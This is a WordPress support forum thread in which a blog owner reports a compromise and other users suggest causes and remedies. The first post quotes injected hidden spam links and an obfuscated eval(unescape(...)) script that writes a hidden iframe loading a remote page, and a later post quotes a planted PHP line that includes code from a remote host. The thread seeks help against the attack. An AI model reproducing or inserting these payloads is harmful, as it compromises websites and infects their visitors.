WordPress.org

Ready to get started?Download WordPress

Forums

WordPress Exploit: script inserted into code (22 posts)

  1. andiz
    Member
    Posted 6 years ago #

    Lately some of my WordPress blogs have been targeted by some hacker. Everytime I check out the source of my blogs I see these kind of links:

    </body></html><font style='position: absolute;overflow: hidden;height: 0;width: 0'>
    <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra.htm"; title="buy viagra">buy viagra</a>
    <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online.htm"; title="buy viagra online">buy viagra online</a>
    <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online-viagra.htm"; title="buy viagra online viagra">buy viagra online viagra</a>
    <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=viagra-buy.htm"; title="viagra buy">viagra buy</a>

    It has nothing to do with my theme, I'm using my own theme and I am 100% sure that the theme is not the source of the problem.

    I have been monitoring my weblogs to see what the cause of the problem is. Here is a list of what I tried to stop it:

    - Upgrade to the latest WP (Yet it kept coming back)
    - Secure WP admin with htaccess (No effect)
    - Change FTP password
    - Check permissions of files and folders
    - Check plugins

    Another thing that I noticed is the following. Almost all of my themes also had the following code inserted at the end of the source code:

    <Script>
    <!--
    var d=document;
    eval( unescape( "%69%66%20%28%21%6d%79%69%61%29%20%7b%76%61%72%20%69%20%3d%20%30%3b%77%68%69%6c%65%28%28%65%6c%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%29%2e%6c%65%6e%67%74%68%29%7b%69%66%28%20%28%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d%3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%27%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%5b%69%5d%2e%77%69%64%74%68%3c%35%20&&%20%65%6c%5b%69%5d%2e%68%65%69%67%68%74%3c%35%29%29%20&&%20%65%6c%5b%69%5d%2e%6e%61%6d%65%21%3d%63%31%20%29%20%7b%65%6c%5b%69%5d%2e%70%61%72%65%6e%74%4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64%28%65%6c%5b%69%5d%29%3b%7d%69%20%2b%2b%3b%7d%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e%66%6f%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%35%34%35%37%30%29%2b%27%33%66%61%66%61%30%30%64%36%62%5c%27%20%77%69%64%74%68%3d%31%30%37%20%68%65%69%67%68%74%3d%35%31%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%0d%0a%09%09%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b" )); var c1439772935;
    //-->
    </Script>

    What I noticed is that the only solution was to rewrite the old WordPress files with the ones that I downloaded. I finally found where the code was being inserted: index.php in the root folder of the weblog.

    I would like to know the following things:

    - Is this because of my setup or is this some new WP exploit?
    - What can I do to stop these kind of exploits in the future?

    Thanks!

  2. Jeremy Clark
    Moderator
    Posted 6 years ago #

    [Post released from Askimet que]

  3. sensifreak
    Member
    Posted 6 years ago #

    its an xss i think have you got a link to your site ?

  4. sensifreak
    Member
    Posted 6 years ago #

    if its the amsterdam delete the comments i made they are secure

  5. andiz
    Member
    Posted 6 years ago #

    I found a temporary fix for the problem:
    I chmodded index.php to 444. That seems to stop the problem at this moment.

    Is there anything else I can do?

  6. andiz
    Member
    Posted 6 years ago #

    The problem is back again.

    Now they attacked the Wp-content index.php file
    This is what I found:

    <?php
    // Silence is golden.
    
    require('http://lovetabs.rxfeel.com/files/temp.php');
    
    ?>
  7. I'd talk to your host.

  8. andiz
    Member
    Posted 6 years ago #

    Apparently I am not the only one:

    http://support.technorati.com/discussions/topic/3295

    Technorati noticed the issue also and mailed every single member that uses WordPress.

  9. whooami
    Member
    Posted 6 years ago #

    Technorati noticed the issue also and mailed every single member that uses WordPress.

    Thats simply not true, since I didnt get an e-mail. In fact, they have no way of doing such a thing.

  10. mvandemar
    Member
    Posted 6 years ago #

    Yeah, I didn't get an email either. They must not love you and me whoo. :P

    Ian did post about it on the Technorati blog though. Any ideas what might be going on?

  11. Michael Torbert
    WordPress Virtuoso
    Posted 6 years ago #

    I wouldn't be too worried. It could be something, but a lot of people have crappy/insecure servers and then blame WordPress when they're compromised.
    I have many many WordPress installations on a variety of different servers, and have never had one hacked.

  12. segal
    Member
    Posted 6 years ago #

    I'm running WordPress 2.5.1 and today got the same problem. Does anyone knows, how can i prevent it?

    Site is http://dvicr.com. Code inserted on every index.php and every htm page on all my sites (my sites share same space on godaddy).

  13. obscure
    Member
    Posted 6 years ago #

    Here is a list of what I tried to stop it:

    - Upgrade to the latest WP (Yet it kept coming back)
    - Secure WP admin with htaccess (No effect)
    - Change FTP password
    - Check permissions of files and folders
    - Check plugins

    Did you change your admin password?
    Did you delete all the compromised files and posts?

  14. Marcel Brinkkemper
    Member
    Posted 6 years ago #

    Are you on a shared host?
    Some user on the same host could use scripts to insert the code on your site.
    I'd talk to your host about this soon.

  15. segal
    Member
    Posted 6 years ago #

    Are you on a shared host?
    Some user on the same host could use scripts to insert the code on your site.
    I'd talk to your host about this soon.

    Yes, I'm on shared host, but it's pretty secure (godaddy.com), so I don't think anyone can break into other users area.

    Did you change your admin password?
    Did you delete all the compromised files and posts?

    Sure, and I also secured blog with all the knowledge I have. No evil scripts so far. I still wonder, how it got there in first place.

  16. Michael Torbert
    WordPress Virtuoso
    Posted 6 years ago #

    On all your sites? Doesn't sound like a WordPress issue to me. Odds are, your server account or server itself has been compromised.
    Change all your server passwords (including mysql).

  17. macsoft3
    Member
    Posted 6 years ago #

    I would create a new administrative username for WP deleting all others. If they know your administrative username, they can just run a program to guess the password just like guessing a PIN number.

  18. segal
    Member
    Posted 6 years ago #

    Attack repeated. I've already changed password and did all the stuff, but they somehow managed to change index files to files pointing to their site pizdec dot ru. It is other guys using the same software - previous attack used to promote another site.

  19. whooami
    Member
    Posted 6 years ago #

    segal, I really recommend using my post-logger plugin.

  20. segal
    Member
    Posted 6 years ago #

    segal, I really recommend using my post-logger plugin.

    Thanks, installed.

  21. Sonika
    Member
    Posted 6 years ago #

    Plugin "anti xss attak" maybe help you?
    for wp 2.5:
    http://mywordpress.ru/plugins/anti-xss-attack/2/
    for wp 2.3.3:
    http://maxsite.org/anti-xss-attack-update

  22. segal
    Member
    Posted 6 years ago #

    Spasibo!

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.